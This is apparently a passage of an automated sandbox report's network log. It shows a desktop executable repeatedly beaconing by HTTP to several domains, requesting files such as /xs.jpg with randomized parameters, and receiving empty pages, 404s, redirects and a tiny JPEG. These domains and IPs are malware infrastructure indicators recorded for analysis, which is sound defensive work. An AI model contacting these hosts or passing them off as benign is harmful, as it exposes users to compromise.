                                  Jul 5, 2024 08:02:38.732191086 CEST586INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:38 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159358|1720159259|3|26|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  130192.168.2.94984344.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:38.741816044 CEST304OUTGET /images/xs.jpg?c3baede6=500657968 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159355|1720159260|4|25|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:02:39.235857964 CEST334INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:39 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159359|1720159260|4|26|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  131192.168.2.94984478.46.2.155807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:39.258809090 CEST193OUTGET /xs.jpg?c750acd5=-1902028374 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:39.916631937 CEST403INHTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:02:39 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  132192.168.2.94984537.230.104.89807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:39.967799902 CEST205OUTGET /images/xs2.jpg?cbebb896=1673734594 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:40.704282045 CEST933INHTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:02:40 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:02:40.710587978 CEST211OUTGET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:02:40.935942888 CEST646INHTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:02:40 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:02:40 GMT
                                  Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 0a 07 07 09 07 06 0a 09 08 09 0b 0b 0a 0c 0f 19 10 0f 0e 0e 0f 1e 16 17 12 19 24 20 26 25 23 20 23 22 28 2d 39 30 28 2a 36 2b 22 23 32 44 32 36 3b 3d 40 40 40 26 30 46 4b 45 3e 4a 39 3f 40 3d ff db 00 43 01 0b 0b 0b 0f 0d 0f 1d 10 10 1d 3d 29 23 29 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d ff c2 00 11 08 00 0a 00 0a 03 01 11 00 02 11 01 03 11 01 ff c4 00 15 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b3 00 0f ff c4 00 14 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 01 00 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 02 01 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 03 01 01 3f 00 1f [TRUNCATED]
                                  Data Ascii: JFIFC$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=C=)#)================================================== ? ? ?


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  133192.168.2.94984654.244.188.177807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:41.070662975 CEST312OUTGET /images/xs.jpg?d597c30b=-2134423263 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159357|1720159259|3|26|0
                                  Jul 5, 2024 08:02:41.803441048 CEST595INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:41 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159361|1720159259|3|27|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  134192.168.2.94984744.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:41.811933041 CEST301OUTGET /xs.jpg?defe4bdb=972408610 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159358|1720159259|3|26|0
                                  Jul 5, 2024 08:02:42.552499056 CEST586INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:42 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159362|1720159259|3|27|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  135192.168.2.94984844.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:42.573580027 CEST304OUTGET /images/xs.jpg?e806d3ea=675115834 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159359|1720159260|4|26|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:02:43.083165884 CEST334INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:43 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159363|1720159260|4|27|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  136192.168.2.94984978.46.2.155807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:43.122011900 CEST192OUTGET /xs.jpg?ed0b353e=-954097734 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:43.791151047 CEST403INHTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:02:43 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  137192.168.2.94985037.230.104.89807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:43.840428114 CEST206OUTGET /images/xs2.jpg?f50273b1=-1659498183 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:44.564938068 CEST933INHTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:02:44 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  138192.168.2.94985137.230.104.89807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:44.819983006 CEST211OUTGET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:02:45.542001009 CEST646INHTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:02:45 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:02:45 GMT
                                  Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 0a 07 07 09 07 06 0a 09 08 09 0b 0b 0a 0c 0f 19 10 0f 0e 0e 0f 1e 16 17 12 19 24 20 26 25 23 20 23 22 28 2d 39 30 28 2a 36 2b 22 23 32 44 32 36 3b 3d 40 40 40 26 30 46 4b 45 3e 4a 39 3f 40 3d ff db 00 43 01 0b 0b 0b 0f 0d 0f 1d 10 10 1d 3d 29 23 29 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d ff c2 00 11 08 00 0a 00 0a 03 01 11 00 02 11 01 03 11 01 ff c4 00 15 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b3 00 0f ff c4 00 14 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 01 00 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 02 01 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 03 01 01 3f 00 1f [TRUNCATED]
                                  Data Ascii: JFIFC$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=C=)#)================================================== ? ? ?


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  139192.168.2.94985254.244.188.177807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:45.687757015 CEST309OUTGET /images/xs.jpg?4745dc7=523145329 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159361|1720159259|3|27|0
                                  Jul 5, 2024 08:02:46.418057919 CEST595INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:46 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159366|1720159259|4|28|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  140192.168.2.94985344.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:46.468982935 CEST301OUTGET /xs.jpg?c7a449b=1256037282 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159362|1720159259|3|27|0
                                  Jul 5, 2024 08:02:46.957115889 CEST586INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:46 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159366|1720159259|3|28|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  141192.168.2.94985444.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:47.224287987 CEST304OUTGET /images/xs.jpg?10878fe9=831958971 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159363|1720159260|4|27|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:02:47.722543001 CEST334INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:47 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159367|1720159260|4|28|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  142192.168.2.94985578.46.2.155807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:47.730063915 CEST192OUTGET /xs.jpg?17066025=-432029326 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:48.456147909 CEST403INHTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:02:48 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
